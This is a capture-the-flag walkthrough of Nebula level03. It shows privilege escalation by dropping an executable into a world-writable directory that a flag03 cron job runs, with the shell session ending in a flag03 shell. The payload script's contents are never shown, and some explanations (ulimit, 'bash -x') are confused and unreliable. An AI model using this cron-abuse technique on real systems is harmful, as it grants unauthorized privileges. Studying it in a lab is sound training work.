Nebula level03 Walkthrough

Nebula is a vulnerable virtual machine which has a variety of weaknesses and vulnerabilities in a Linux system.

Description of level03
“Check the home directory of flag03 and take note of the files there. There is a crontab that is called every couple of minutes. To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.”

Go through the home directory

level03@nebula:~$ cd /home/flag03/
level03@nebula:/home/flag03$ ls -la
total 6
drwxr-x — — 3 flag03 level03 103 2011–11–20 20:39 .
drwxr-xr-x 1 root root 100 2012–08–27 07:18 ..
-rw-r — r — 1 flag03 flag03 220 2011–05–18 02:54 .bash_logout
-rw-r — r — 1 flag03 flag03 3353 2011–05–18 02:54 .bashrc
-rw-r — r — 1 flag03 flag03 675 2011–05–18 02:54 .profile
drwxrwxrwx 2 flag03 flag03 3 2012–08–18 05:24 writable.d
-rwxr-xr-x 1 flag03 flag03 98 2011–11–20 21:22 writable.sh

The writable.d is open to the world for reading/writing/executing and then there is a script writable.sh.

Breakdown of the above program
ulimit

Linux itself has a Max Processes per user limit. This allows us to control the number of processes an existing user on the server may be authorized to have. To improve performance, we can safely set the limit of processes for the super-user root to be unlimited.

$ ulimit -u unlimited

bash -x

$ man bash
-x file
True if file exists and is executable

The above script loops through the files in the writable.d directory, executes them and removes them afterwords.

Vulnerability

The vulnerability lies in writable.sh, which runs every file that is in the writable.d directory combined with the fact that writable.d is world writable.

Game Plan

  • Identify the GID and UID of the flag03
level03@nebula:/home/flag03$ cat /etc/passwd | grep "flag03"
flag03:x:996:996::/home/flag03:/bin/sh
  • Script a program which executes /bin/bash as flag03
  • Now we have to make the cronjob compile and execute our script. The cronjob is running with the flag03 permissions.
level03@nebula:/home/flag03/writable.d$ chmod +x run.sh
level03@nebula:/home/flag03/writable.d$ ls
run.sh
level03@nebula:/home/flag03$ id
uid=1004(level03) gid=1004(level03) groups=1004(level03)
level03@nebula:/home/flag03$ ls
exploit writable.d writable.sh
level03@nebula:/home/flag03$ ./exploit
flag03@nebula:/home/flag03$ getflag
You have successfully executed getflag on a target account
flag03@nebula:/home/flag03$ id
uid=996(flag03) gid=996(flag03) groups=996(flag03),1004(level03)

Happy Hacking !!!